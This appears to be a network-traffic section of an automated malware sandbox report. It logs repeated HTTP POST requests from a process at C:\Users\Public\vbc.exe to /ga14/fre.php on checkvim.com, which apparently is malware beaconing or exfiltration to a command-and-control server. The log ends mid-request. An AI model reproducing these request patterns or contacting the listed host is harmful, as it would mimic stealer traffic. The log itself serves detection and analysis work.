                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 15
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    10192.168.2.22491755.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:38.967765093 CEST232OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:39.323179007 CEST233INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:50 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    100192.168.2.22492655.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    101192.168.2.22492665.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    102192.168.2.22492675.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    103192.168.2.22492685.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    104192.168.2.22492695.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    105192.168.2.22492705.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    106192.168.2.22492715.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    107192.168.2.22492725.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    108192.168.2.22492735.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    109192.168.2.22492745.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    11192.168.2.22491765.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:39.638770103 CEST234OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:40.025614023 CEST234INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:51 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    110192.168.2.22492755.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    111192.168.2.22492765.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    112192.168.2.22492775.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    113192.168.2.22492785.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    114192.168.2.22492795.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    115192.168.2.22492805.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    116192.168.2.22492815.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    117192.168.2.22492825.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    118192.168.2.22492835.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    119192.168.2.22492845.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    12192.168.2.22491775.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:40.313215971 CEST235OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:40.677572966 CEST236INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:52 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    120192.168.2.22492855.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    121192.168.2.22492865.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    122192.168.2.22492875.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    123192.168.2.22492885.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    124192.168.2.22492895.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    125192.168.2.22492905.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    126192.168.2.22492915.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    127192.168.2.22492925.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    128192.168.2.22492935.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    129192.168.2.22492945.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    13192.168.2.22491785.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:40.962631941 CEST237OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:41.324284077 CEST237INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:52 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    130192.168.2.22492955.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    131192.168.2.22492965.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    132192.168.2.22492975.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    133192.168.2.22492985.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    134192.168.2.22492995.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    135192.168.2.22493005.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    136192.168.2.22493015.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    137192.168.2.22493025.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    138192.168.2.22493035.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    139192.168.2.22493045.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    14192.168.2.22491795.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:41.640229940 CEST238OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:42.012145042 CEST239INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:53 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    140192.168.2.22493055.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    141192.168.2.22493065.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    142192.168.2.22493075.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    15192.168.2.22491805.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:42.299756050 CEST239OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:42.665060043 CEST240INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:54 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    16192.168.2.22491815.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:42.959615946 CEST241OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:43.342381954 CEST241INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:54 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    17192.168.2.22491825.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:43.668917894 CEST242OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:44.033987999 CEST243INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:55 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    18192.168.2.22491835.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:44.317406893 CEST243OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:44.690879107 CEST244INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:56 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    19192.168.2.22491845.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:44.980669022 CEST245OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:45.327651024 CEST245INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:56 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    2192.168.2.22491675.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:30.225629091 CEST221OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 176
                    Connection: close
                    Sep 28, 2021 06:50:30.580647945 CEST222INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:41 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 15
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    20192.168.2.22491855.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:45.606333017 CEST246OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:45.970263958 CEST247INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:57 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    21192.168.2.22491865.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:46.257925987 CEST248OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:46.621850967 CEST248INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:57 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    22192.168.2.22491875.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:46.934037924 CEST249OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:47.284598112 CEST250INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:58 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    23192.168.2.22491885.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:47.567337990 CEST250OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:47.929215908 CEST251INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:59 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    24192.168.2.22491895.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:48.217751026 CEST252OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:48.600373983 CEST252INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:59 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    25192.168.2.22491905.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:48.901348114 CEST253OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:49.275072098 CEST254INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:00 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    26192.168.2.22491915.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:49.543982983 CEST255OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:49.910859108 CEST255INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:01 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    27192.168.2.22491925.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:50.201147079 CEST256OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:50.559416056 CEST257INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:01 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    28192.168.2.22491935.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:50.837245941 CEST257OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:51.200424910 CEST258INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:02 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    29192.168.2.22491945.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:51.664554119 CEST259OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:52.034302950 CEST259INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:03 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    3192.168.2.22491685.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:30.788969040 CEST223OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:31.149317026 CEST223INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:42 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    30192.168.2.22491955.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:52.442626953 CEST260OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:52.784749985 CEST261INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:04 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    31192.168.2.22491965.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:53.378968954 CEST261OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
